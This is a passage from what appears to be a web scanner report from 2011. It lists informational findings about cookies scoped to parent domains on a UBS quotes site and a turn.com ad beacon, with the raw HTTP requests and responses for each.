Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981931097:ss=1309981804815; NavLB_PQ=quotes-public1.ubs.com; Navajo=Oomvgp9vP3Ft8Qme0xj/ea+sM9tLIa0aq2VJZr9IfFggC27Pyuw23/id1aMLQ/bugMyFA28yaAE-

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 13:52:26 GMT
Server: Apache
Set-Cookie: ubslang=en-US; Domain=.ubs.com; Max-Age=2147483646; Expires=Mon, 24 Jul 2079 17:06:32 GMT; Path=/; Secure; Version=1
Content-Type: text/plain
Content-Language: en-US
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 0
Location: https://quotes-public1.ubs.com/app/CGT/Workbench/wb/legChooseDomicile
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

9.35. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/de previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://quotes-public1.ubs.com
Path:	/app/CGT/Workbench/wb/lang/de

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ubslang=de-CH; Domain=.ubs.com; Max-Age=2147483647; Expires=Mon, 24 Jul 2079 17:21:58 GMT; Path=/; Secure; Version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/CGT/Workbench/wb/lang/de HTTP/1.1
Host: quotes-public1.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:07:51 GMT
Server: Apache
Set-Cookie: ubslang=de-CH; Domain=.ubs.com; Max-Age=2147483647; Expires=Mon, 24 Jul 2079 17:21:58 GMT; Path=/; Secure; Version=1
Set-Cookie: Navajo=wwy/bl/536LcaMPi7GA/Za5JB+9u0vIfbxz1PWDLCjlHhr4eOK5kCvNkSrvKkTm5roTeIgMCGhY-; Path=/; Secure; Version=1
Content-Type: text/plain
Content-Language: en-US
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 0
Location: https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

9.36. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/en previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://quotes-public1.ubs.com
Path:	/app/CGT/Workbench/wb/lang/en

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ubslang=en-US; Domain=.ubs.com; Max-Age=2147483646; Expires=Mon, 24 Jul 2079 17:21:59 GMT; Path=/; Secure; Version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/CGT/Workbench/wb/lang/en HTTP/1.1
Host: quotes-public1.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:07:53 GMT
Server: Apache
Set-Cookie: ubslang=en-US; Domain=.ubs.com; Max-Age=2147483646; Expires=Mon, 24 Jul 2079 17:21:59 GMT; Path=/; Secure; Version=1
Set-Cookie: Navajo=6G2OGI4Mofoqm3Bjc1IRFE50rP8F7k2B0jFsSxftOEdoQcPDAFecRqYUR7Aq9MgK2AOPyJpTcGA-; Path=/; Secure; Version=1
Content-Type: text/plain
Content-Language: en-US
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 0
Location: https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

9.37. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/fr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://quotes-public1.ubs.com
Path:	/app/CGT/Workbench/wb/lang/fr

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ubslang=fr-CH; Domain=.ubs.com; Max-Age=2147483646; Expires=Mon, 24 Jul 2079 17:21:58 GMT; Path=/; Secure; Version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/CGT/Workbench/wb/lang/fr HTTP/1.1
Host: quotes-public1.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:07:52 GMT
Server: Apache
Set-Cookie: ubslang=fr-CH; Domain=.ubs.com; Max-Age=2147483646; Expires=Mon, 24 Jul 2079 17:21:58 GMT; Path=/; Secure; Version=1
Set-Cookie: Navajo=Wyg33L33zBKvKRR1J07MC3T0k3Ho/EjMtEtx3rdubNAr32qz8nf8xwGoImu5je3zV/T53mEjDdg-; Path=/; Secure; Version=1
Content-Type: text/plain
Content-Language: en-US
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 0
Location: https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

9.38. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/it previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://quotes-public1.ubs.com
Path:	/app/CGT/Workbench/wb/lang/it

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ubslang=it-CH; Domain=.ubs.com; Max-Age=2147483647; Expires=Mon, 24 Jul 2079 17:21:59 GMT; Path=/; Secure; Version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/CGT/Workbench/wb/lang/it HTTP/1.1
Host: quotes-public1.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:07:52 GMT
Server: Apache
Set-Cookie: ubslang=it-CH; Domain=.ubs.com; Max-Age=2147483647; Expires=Mon, 24 Jul 2079 17:21:59 GMT; Path=/; Secure; Version=1
Set-Cookie: Navajo=tyKPlvE7DsLkcB09TcOGFUhMhpU2+qTbpNwNpzilJDEKEJ4haF5DeoAANdBD35geyk8nTgKuvAI-; Path=/; Secure; Version=1
Content-Type: text/plain
Content-Language: en-US
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 0
Location: https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

9.39. http://r.turn.com/r/beacon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/beacon

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uid=4325897289836481830; Domain=.turn.com; Expires=Mon, 02-Jan-2012 15:39:04 GMT; Path=/
pf=jYpfHiwkL0q9Fc9kSjyuBBgn_wnb0_8qr_BqadU9rG7QZMj4YW4gjixh7pNwS2UBTEDZiJ73QG1Fncs-ZvtnGF1FGvBOgdBbEZX-YnBGLm7gM3D9ilPTjzMPHfvm2ZJRnQ3ziRBzpEB5dtK5nAeBUmYbbn7O8vmG9T4ZvTBxZ-fkUczbVJT5Cai6PVkpiYM250Hn9REtTxKxE8sY6J3ypnin2DltV7TDetw9hjspxXZhD8p41r9TwMfEMg-G1XemtTB2tozm01YLbZIiUMvmqnqcRK5l5t99h9o1nyRJGB-FVxq_hTarUuNMxmlOGv8i7uQNESU0ZB56kdO0OzIJXwIs_FraXwaqx9H3t0t_K8ypqvHTLNec123RZuM5_NQFc2SDKyJaL5qarBv4Mwfu6hbDkZ7-COXcc7J638-N2-nGmnSXYlumivx65OLyIDjkiclTN27E7VAjyP94ylXV2THc-FaZMQYHJfzm7Wd4vCeBVksj6qG_vGOBRszlEhTBHJJkbCwqlvtJ4YMajskqFiOxya5mnbA7S3fs-iJhVbcnz2gJQYfShI1TCMqbtLiB20vA45lRWnNPOHTjbHe0UEpEgz7rg3mBmvvpNOjjPm1ShVQJNOkuyKXxjHeUbdb1vdEe_5ovSouJNB12j0ymtjbRa7aarVBYGbRDMIU6CnuHCuJ-pktYTsiyWrGNv7OuJsye64pN7BOura6aOSSI4b0Rt8phWSAaqD7MP1KznZpkTlhpXh4-TTR0ThSULn8x1UaE9wNorS3GYtjFZhcRVjJtfcYNkhzgDL3eMoWYNnYZqDKZRMvFd1ZKcUJuq_zhyyoX1Pm8pjzP3_QghQ9Mhio8jk9cro0gAwFF1DDFwTgH5PxTXVL6MoBnLB4b86CcB8cTKKUjKihGgM2TUJhZG3-h45YbzGndZUDHE2X88AvIcBSo3moUduDgWZjkDYofLI3QTC9S8KPN85sRP4COobdYXsT06PSNQWuuG0Xn65Z3TsjwnGp1987qUWPEQeKMZGxJcekloD_rTqVoMnmvyUxnoiuihCenkYB2EtVtlsCeyQt7jyEfnyFotaOujGmKeSahF2EZm46lAKLF003b0aLuJG6qbnKeGwdBvyJVdvGSPywaPWKJ5BRBfOF_6vvw0FtvmqU9JaAKw66loiImQTLzz78ETcLhQCLITMYwtftNww_XA-rRSdgEN76SA2KFbCG0h-75nZpxziOW1ekTf_IRDhOcOSKJofmwpZhjQmZKT3Nh_cPzwAkdpELNjsHGDgwfAOYMl-ze4C007tvDJ6VdfZ0Oh9nSGeaNSCn7BkNAtEibl5r00ChmOkCE37PQIS6dq7wPT-1B87w3eSIvWRK6JC2t1oeUqveL4vnLZ7v2BI8mOR_5Vtk4hl7LQbH47KHn9mApouFIrwoHgitvHAehUtrZB2pIKMrOd4ecGu_5Td_uxCtmy4XXdxPxi6IKIjh7TJldhJ1GEczWVD_bGDc5v-2kLO9WqTDY302oYnzhwqCcIDoCNscaj0YzBqlfTzIyDrkH8vxatsKDAXQ4Jtsl3_oK7x_ip5W7JjCcrLcd7TBTL-_O684O_LyajFvidwb0lwMpvI_qobXEf8vwpXx6CjgObJXPAwErnDdRiZXG6Rzjlrpvxx7MGKC7oc-DJnbgu8dTjdEu82cH1uuItohCE1GVLsDIM9OdE-Q70TxRIlHcKuOK0l22qglRvlRyVeDa5R_skBBpROqVdegphoCA2EMAYy34m3C8AxbQVXv2tLid0B5RDfv1jI7nqI1f-8CctWfpBr-abLfwawha_eevSu-BeNRGS6-l3e5LdUzjTr5IHUlZPEoPSUcuuHcGVq3GMZ6CGJzLxK1NMIN_YWa2WWtfKqGIbTsLzoX0-JPgHLZuqjGn3YuU0loBjwMsmJ7XoXxix2tpkkNV5h1NZXB331PWryy2AG1BPJuJLVT4zIbE77kZcMZssTCDF_zNzv-hOQROl4HLc4UEWkb-u9aQ2rlen_mi55lWZqga_d0hTj-SD3oxsmwzn6Nq55trU-j1GQDzb1_ZvVwhRx0Q_uptE48rH8XCjOJUjQpNRLtZUDvekFZYlXQhitDAZOk6GY0VvVV0mCTSvypWIKrmyCjnr_gKagRSe4UTtSCll_gcGWTDNHC7qecFGk6z3e4O0QjMPBVo19szbTqBQzKlRSAllb1lD1Roagx8HVZqckVirWevftR-aku-hH_QPd78uCldR6o9Qveax8GXpS-aKypm31G_2IGt-C8CPV-k7sgwePfDaD07bFLHwbqeTRWrco6_yM2p6Eot3ZwbE8FNSMSRIUsVwczLLGyq-r3M1YwftiV7Mf5QNKakiimAbPOjWExPrbATLtIx3O0c7l-xfe6kPje8Lja2G_-zUipKgOcNMCj-oHgdiHJqq2uIgWnKHornuDOeLaiUkHIWVvckwkpCJBC2lm-u9i2rrm29_ZDe5dliakw6C2Rj8twiLlfzlikzpR7JfAp40cJcV6GlW0tIfGplg51pTREVDGmHH4AODXGdnK9TWlENpzw35TNdxfAxeUs1cPEOi64rainP0SCUkAmOLbuWn7tumbrHggoOTL0WyCGh3thvCqRtyaVRZz-2-3jDxWUSFOnuPF3ocmPNwA_bOdm7YVJUp4jOEdBZiYsXssmmvAyBz0cS2i2Tg9SBfWFvM_sO8OKD15OvQrtoSZMz5FTL-BuuozwA6N992I4-6hay9R2qPdJa0ze6SLrcfsCWB4Ky3zErqDyKQ9H0wl5_pELpIMT-1qNVdptv-2EVPdJHgZb0fdvbb_D05T4qw5NQ4IrYDRR6LV3elq1du1FqUseWHsqUVdnaZ2p6yXCUtvl4kPfb3QvIQhlltw8I1JpUh0NabZ58BmDwzPN5xltYK_LIcmdq_cpCxj7gQ2WlhFEkoKakhmHHWFkCePG_lq0jHRCZqo4u7okLdFJqi-23qryL4RN3Z0_aFQqDJg0rCBPD3aZqwLxsqDIrP0omCCN4boCegtfrjelXIeOuxrabXhN352MSihMc3-CVcb_kL5lOT9YcyoeJCg59Ijq8T2zgbVOU6zwBc9BcCnSWHFJw_RNB4fezftLML9d5dfvImsTPPvytRq-SoKYxwTHeA0JV-k-xaXuxkj_GEZSFgKdvBKHx9YsruAWjGFxZI0LubOY8fcDAh6xXzWCLVyQcJ-4oTSkYea1NH6xrxdYAaCV1D2k5am92malOiIupL4cMEfCOY7PzeBIuEFG_TjYOgum33GKCIuS7h__v7R45kyBgr7GCpwTTxWPWsVXGEu3LV_WOrXIlPfB_scXK7chTLmYhurC2Xmi93xEyKCpBoulsldLgoWwnRjkFUAbIECT6iggql6xRUe762UGNEynlJ5s-S_H9UP9RUUV02QidOFo-W0MGae-aRTNY2Bw09vXCoTf8EnEVDK1AK-L1; Domain=.turn.com; Expires=Mon, 02-Jan-2012 15:39:04 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/beacon?b2=dLIuOGfOzkZylUaPcW45J1NM3fA_ZnR2d4cPbuMElFEvYxI1ZImxMCpPyY8hh_IBrR-1pVaDIemsGHXtH-_-EA&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=jPCRKqrj87qIJxtlMQWAeEChT2n2hjlNeUtfI18EVvCY481wEkFtGX7HudJA1SwJI3d8wh-8F3M_mXcdjcS-VSm0eLaoIKxUGXp9LrfCkU9_tnfsaUjBl08t5WPRK0VURVro0VaYJSFBW8ummLzmaIKBmXLKaNQC_VstFH2_fFpKQkzhSzd0OA7TdBU9TjZEJGXtc03lRAW7XQ4DISJNToVALrQWz2MTLkxqGX2dkixiiuCgw-RUBPrhyXIonq-JO1Bp39fVI570M3anNYXEeUs1tPAJ0EW-1VMg8V7a5wldzyMGDGIyTnWkwLiiAh9MnoUAhDiUl9Tegk8e5loBtCPfUfWmFvuHa7ho64SbyNRCdB0gGLuWZn2SFARzFJPESwQcmlx05sJTCiLTcgCP4At5Nkw2i8ci7zeXoamyfIkXLuYA-Dhd_NCbS18tUNtNvkWLzJ6aRrpGreADONKQFjqdAq7HLak39li3oOzBb2LeZa7kJWdY4s3_LxRnaveh3zRKhr_QKICSCDvtEvXL5bc_DW9fRIIhGqjaZpBQKPuvEW4pltifd2UFOGJBUm-HNrIvCCgnCtouI-Uiugr_XDqnokT_uSlOVd9om3L3_Zyu-SvKhx26d2lgxRL2g7NnpnufmqwPr0iX6TO_QvAchAci1X1kdq4IOav-VGBUnPFENQMte8mJeFRkxXb-wFJ5RVro0VaYJSFBW8ummLzmaNGHuZ00Doye8JlLv5mr5PFKQkzhSzd0OA7TdBU9TjZEAKZ1XvhQcWRwSquFFdyqk27PUbblbYukMk_ukxgrNp1iiuCgw-RUBPrhyXIonq-JrVUsFGMjIsjG4wG8JccNY0s1tPAJ0EW-1VMg8V7a5wn-FB-cNjGuev6cKfXYBTnN0_vou2SdMt8u86ZsS3JrqiPfUfWmFvuHa7ho64SbyNQHZddyBwQ_bn6DeUZJIktJSwQcmlx05sJTCiLTcgCP4PkIlx5s8TLQpLlToa_KmjIJFHg-6pvIHl5Jd-boptVivkWLzJ6aRrpGreADONKQFi1uWhCbBLDkUUl3GB-cia7eZa7kJWdY4s3_LxRnavehkKIyZUcKn4gaSbbrzqSrcgqUnZs_qTc4J1uECWvW6WbTYemUMl4rww0Ahse7Jfbjh8YLajdpYA5oCRPEinWDNzqnokT_uSlOVd9om3L3_Zxs-1IWnYFHuATbbO_y4X0qnTAQXKSKZxRRHNLIhO3aIaSqEypMHifOKCbgAvu2-dYixi2mthDBgkkh8E1XVaeYRVro0VaYJSFBW8ummLzmaFVfdYHK1Q73JpHXN0tZ5ChKQkzhSzd0OA7TdBU9TjZE1kmOSSok1OTXuW9iz2m4nL5yE_6sd6seuxofVhtsYmBiiuCgw-RUBPrhyXIonq-JQurUvISATSSNOXvmuhMCV2KK4KDD5FQE-uHJciier4klqT8ZcugfJqC9EwK5ktSgSzW08AnQRb7VUyDxXtrnCWozIMOsCXwOUoX3GwmeVVAxi8wzskQPsxtBtldyMSwagsPhD5djythOHSHCTJOhXN8kothY4cGzuNEdryxzqqlLBByaXHTmwlMKItNyAI_gA5nIMgtWWpg9SGtTLubci8mKqUVNtCEf11hjerFm783rueT8thuReMGYM-G8N401JqMaNEKucbt7MzwWQQWU-d5lruQlZ1jizf8vFGdq96EVQq5esqu6oyUY2zlzU2xLXWhOIfbu6nlVGazQ3C00oYS8zm8KaUf2JPX_XkHFplCbza_ABfjL7BKJWmajZwI8OqeiRP-5KU5V32ibcvf9nKIPnlMyG4VsL_dpoB-0W9QGvLE_z_KyAskRioKbfxN_786M9IuI8BYnDc-poA-MUnfZxmx8Z1na_56NWnVp5lVFWujRVpglIUFby6aYvOZo-guTtl2FC1HRuw7-BKiPgkpCTOFLN3Q4DtN0FT1ONkRfEwEV-i4hDFcRNIjoo2NgkPVO08UdjTRS6iKsNti_SGKK4KDD5FQE-uHJciier4kPyz-Wufncl9LyPoL9B1QKSzW08AnQRb7VUyDxXtrnCYqBIOxmA7cQDFoERRAumqjQS-E5nxed_shBlbXuObLDI99R9aYW-4druGjrhJvI1JH00lIUEmEEA_OFUDNzutxLBByaXHTmwlMKItNyAI_g_3bTqCYCGbHkXEVzPY_01mXeNri_O61lm1ldtHVrpR7ZPRGnTyb4BtK8arS2F9YZe4UCz5TMA5hwrPrqery6C_wkRIQCoel50LHttKKxvj2T-81UMTQPlYAknpDpTSLEO5HiathQKE8omxVc53FpCRoxDfNmYDnxg0EvFrwRe3pCS4dcida2s-s0XQ4z8fCn0-2F-mOoQpGwjdYnRQCARZtq_gHnWf9fXfe0G5ZJVnGpH8LKKIm0TYD_Luo27v_Fd79BPBBGXhysRhWpW1cyG4cyxzjZGmjTf1aqiATmAjS8PU8Ims583iYmtl6BnonGOZ_I42pI-l997CutSY5UTnU6t7Hj0VsEozVWpOhdHdFbLfPqvGJUWoA-TUxLJGtuWy3z6rxiVFqAPk1MSyRrblst8-q8YlRagD5NTEska26shJ8rvIZ2pEIvj7vJYr_-ftZVQVVx5oyA1oNVdb0c2RvgUG90xsnNOLDcsndxj6Hfhp4cgON-zdligsRs6_1T34aeHIDjfs3ZYoLEbOv9U9-GnhyA437N2WKCxGzr_VPG0U7eaD3Hbtxwd0g2BAEnxtFO3mg9x27ccHdINgQBJ8qENCoPz5YPQkhGm2FiUj3LFz3e1wa31-DKI83R83jg3QTL9zDrzTFlXoiMqjuSWt0Ey_cw680xZV6IjKo7klpI3j9xuCx21BIxBdXN5YAR9AhrAwqavcLA2O6a4z37Lsij7qsRPo1Q9IcnQsYBZ5nZ4Yik6WYEG4S1yIWi95cAawB_d25XmA1YnkFKy4M4_IsLKOVSlL41zvQ6wOKAHEjq7nKInFrgoG_62xoiLBKT6u5yiJxa4KBv-tsaIiwSk-rucoicWuCgb_rbGiIsEpOvDsfne5seg63D4x3flsyZrw7H53ubHoOtw-Md35bMma8Ox-d7mx6DrcPjHd-WzJlOSrp14Y383TLXFJ1T7HeQDdh5RodnqZ0dgGASOf1Fng3YeUaHZ6mdHYBgEjn9RZ6k3CneyeK26bqX2BslrNlwDg97pn0xq8XVtSFY17J1rA4Pe6Z9MavF1bUhWNeydawOD3umfTGrxdW1IVjXsnWsZmDwoJlEZXfDBjNrKbkdHGZg8KCZRGV3wwYzaym5HRxmYPCgmURld8MGM2spuR0cbb0sPsXWgw_x9D6jnx5LK_2BhDosUowXxXmwB90G1tj9gYQ6LFKMF8V5sAfdBtbY_YGEOixSjBfFebAH3QbW2GhE7gFloT4X513bbUoowJpoRO4BZaE-F-dd221KKMCaaETuAWWhPhfnXdttSijAmjoFfr6E7AtWKXcAv7zPgNhKraltt_znEUtPzey_YSNRSq2pbbf85xFLT83sv2EjUUqtqW23_OcRS0_N7L9hI1Fz-QUXxY9m0RT2v_0PtAEz3vMJW6Nolrhqx2yRbBnwHeM8DMgjvm5t97BtYytOx4Rqhj3O8p-XR3nA6DvXKpTl; fc=NPwnTj55SxablmgxgOU6YvTAau0fxQm9Ss2FVtOc0fRwe2fiMiJstcorldPAQEWsjtR00WuVUesotFeF8b0iqzTwskhjzr5X5fLnW2Y1L8oWeSZAoSqfzCTWGJqSVzUxwmWj6rOwJQbNe1FGkQ72Mr3ZyRv0KSWu8UtGn86vdZZ2Bxw8hDOLkguYqml5zW-MINBiIQ09VuaB6H4kNZ3jvWDXo_Ub5NvFSqNxsTqhNOEJzdGEYQUbYRsENlG1EkxlHr-vpMpIww2oeMaNqJcAGNVCVYgScgvT-7lnf3tWEtoI26ZIhO_EYD2Jv5etTb7nPXORZ_ihz3v_EDqUfBGd38kaFp7wmgHwSln4BB0aAU-Y-fE6mCrmAAKxJpNINZh0gYrE3U6bhGdZv_0Ofvauqo02tkR5MgBK5U8r1oXGHyKLM2r82BMAlsOE4kKakojRElg7FxL2FmmNWsvuLk3EV1Ob1kR0cv3Vim-wWYu2PuOaPtJF5zGBev3l88f3V44c; pf=imLa8Y9K7y9JWjvDp9rzLXdg786oafP5T-2J8P9-MbRqAdtWEIdLx553uOXwyk_d7lMV6ku5x6Fs62Dm_QelJC3HNez-Z8pMdla1M14yZ1aXhaLn0WGDkLMH4cxWtxtJnQ3ziRBzpEB5dtK5nAeBUmYbbn7O8vmG9T4ZvTBxZ-fkUczbVJT5Cai6PVkpiYM250Hn9REtTxKxE8sY6J3ypnin2DltV7TDetw9hjspxXZhD8p41r9TwMfEMg-G1XemtTB2tozm01YLbZIiUMvmqnqcRK5l5t99h9o1nyRJGB_k59seAzgg1-n2fcjLvpOMi9tA_b87Jqn_e3gK2wczGx_CWj995ZG4J9ayZG8Azab13_ic6bm3qPlYluqL2y0jaU-Oqt1gdom4zJIFfDwZ9PMXsV2RPLlXKhVOkCzWSAMHy8NkV9GlxOD5jcadlcpoFV-_N4_TQoIGyiXOJHiskWx1ZATf6jr6V7CCyVFok1rG6pyhUqm2FHzEiDJ6sf-pacXWwno-sBBfZi85NtW5Qt-_BHDFm96AL-Hlvz6iB4BqpqgoK--2Z8dYtNlLNE0_IPCGGg4JuduY91z0-G9PFEs00MFyErnctvH2BT73d3_FZBD7b-KShsGHFtw-PJccEMxwAG8SoEVS9m9Zd2vmWErUUgLCw4NxIwxNfjDRkuTL2j5Yg93F_QOtFzYyWOePChv1i2naEiRm-G40oRJBGTBpVCc0qMQ7XSXeQvsWsjFHiMSxf4LuiqRb7JIEpKg8kby9cY_1mRgRy-7Zp8tzhfOiqJ0pMkyWUtj3tCfqb_tGZRzNBjxRhmI6dM4mbZKOYU4-nV0UYeEGUxF1S_oHu4hFkzr5r4tc43qm6cSueuRO2hVcsSqb840lbAIGS9ubZxGaNUCyMdwNgf2avKHVNnolOOu7jj76mTVAdA_mdYfmHtPNZuqI_jxiXxEOs5H0vlfIlKbmfHqHUcP5b-IIns1zek1KJ0W2qXBTetRtqOYNCGSsyjP4AXt3T9RPBVkJDNnxwnTaHhSt6_M966_yDGRntkal431Er-D6EvQQXSzw07Q7-ZTvu6ltuMBngQyhlUXNT1Hb5nCH2u9H8JYL2vqi7ZcubYPjdCiTEvC6ixvxWnBAvvN4YHBYs623Zfp7mYinN8F-xomiNBADxpAVRXj30kPclrBAUX47luAB61FeciHDtDUZA6oDA9lgECWxePb1qgK2wydMqKon7gU_K8C3sxgZqLnqGwdljDWk8V-5saTK0J9MhEtW2SZi442SAJJiCcWe8XmAo-ZeIFD11aDlRV7nM6V6_zFKpP7wlLYQPKIschJVNwDZdXQ9qmKL_Qbi_JfgEHW4reZkqoXAIHtX_b9gyna0u7aW5BDNIqsWhukbMM8brSoTtnUG56p5TJB44WFzdjkM-mROp9OOL7FDQ7cHkGLYBuqZ3lgWaipiAFXhGx2dqcch-VuzoEikRXiOR4xaxbvDpaqAiEb8VhvKcFx-ovh4Sl88FoBqgf0tyxN9W-kw0R4q9C5CmY2JUjJXnRD7WzNJZ_sCBAgpM1TWvCRlVZFXXZnqNPukYr_L3KLsKcRyxoRdaMovUBfTNEPRSKFgtbcbx8BqX90ZQQcpEfWqJMVmEBPEAIGejpPCFWKz3O59OPx58buvJ_uvNLcUoXM2ObJkBpZIBDJKm2ziC3HJIl0BWgLsB3Xb9sspub1VzehZ-dnjQrUAX1RWz23DJ4AN2p3Bkps3nmT_CyZOWO0K6AmyoJJ0WVqwfHJmkvMMecgZzynLsGgRc_i10bzP3aegk4VhMUbe1DPDoRajStMsbCQClj0a4aNFYQ33AhPyEf_pRhJLMk6r38S9EXL7rx5ntmq24iXH1baYIQ5WA9IExVRwqhQKkb2ecnJ-2UOQj0PVB__QK20iFxmMrBi_Ozk9p2lUUv6L37oAr_AV6d2dHRLCHQNMiRthyWEMiVlxcMdEeKLokMX7jcq64dIsZNbiFzVInJ14TCwCQ9fqReykA8qBRaCLn3AdbjtskBuPk60M0N683DQsE4ZC-hxMORC22isekOI2V75sPw5QLpTHbDx3qmiChRuhkT71jvR1w1cjNDo5Itf_BvoKeVF3ZR9-1s7QiDoMPUY-ZVqhnCeQMjDTZrbWEsRIvXQWcM2EqCJfHKFgH6ShjUTMi6Fy8HuTX3hHZqIyshrEm0-qlU6GLKu8GfLpkN0bDQNM4p86wye9uBqQI4_fI7zC0JJ2DuRXGxP-2g9_CgYuY8pN_VrecGDh6UwTrru9GLmwxbidN1AUdQybKB4VyjEokVAfrO6zFP7ekqOUhJzASYimudaJc-nqwrLqeBidwfS-yH1nGi3UeGqKb9R2O8_f7i8ovAE8EZ8c3EpZGfdvY3YmYKNPM3iO16JJWQBvkviQa82CG4NkuHuK5hHF8F4pZHDyRRzEoRhIsHjaFVUhglHsoi-_gue4Y9GYFWcPlXqN1LcUW2PklnchprXEhv3r7HtHIEvOa8bUpKMjK8lg77zJlCabEdFr8zLsnvY_jhe-w8LS7NnrSfPrT7_ys5OYzXfKqxN9PqlPQO7yAyIRqyycyKA8i0F3zIMbv5tUub_jys2KG-DoXTNzLTlHYmH8wMN_undN9fZc-pI0Ny4hubjOBUf2DQSm9Ohj3B7jgP9CCqG8Wt-ubVX90wI71XdOFbmuO_nu7xzWg1owdmgiD4haU31wETkVUs2IUBSWSwU9HuGqutvFVd-RPEMlRmI-tk5XQOBLE3hkIaiREQLK5qM9EX44AOJlvs8DYm-_z8wtr-sIKH6L02PQc77v8w4KeUWdpWld1cOt5B9y5dzZtTu3JqKGLAN1pzcD0dPfCuBK65VIPkK5kWZct35sO1Zn7pXWDz9pp4ib7xIdhf9zRg7pMNE_CJ40sHgFesrKS-sIOtZ0uWaFVuInERcUbOl0hZVWfZ4IPC39oh4ISFoEomPNyVVtSZY1RAo6Ssw0gNhdaAh0ubUxGmkN2fgVgehhyd0pky1b6ARNsIvyharCLLEFwpnlzXrhrzzYYv8tbnjLz1Zdsb_zZj1IfqS_aLZsRx-RLssOEi8Ic52I1SwSEzv1L7Xgy2Eldwn0osGTLllLrxdLGKvBbatPkttpJfAXFMB_81ZZqVp19l6yq--kytbvLV02MMBRF8QbYmkHZ9XZAHAsEZLsmJUb3ppXhtS9nRt7KX5Xvit0JJ8VmH7pEBcCAAwb_dsSSirzOYOWSpt9tKo6CdsoHgH6aru4Y4C1Oo_U7A4BsmBGEA7E6lGoeN4cYQLBhIGU78mY0O1B84kcRbagcEY3bvKO4WENO-4Aup8ydwoW1LAK5lzDCZf66Ro0bevR-FWOxJFZXHpkSB-wiy2euPF1s93pcsDAmXOMvRijJwI3i6Kr-KRd8-6tGKt3Z8Sx3Gwu4SNfNZ4Dc9CPpihH8V5KiSx-wwNBb6P5; rv=1; uid=4325897289836481830; rrs=3%7C6%7C9%7C12%7C1002%7C1005%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C18%7C2%7C5%7C1001%7C1004%7C1007; rds=15156%7C15153%7C15156%7C15156%7C15161%7C15153%7C15149%7C15146%7C15151%7C15156%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
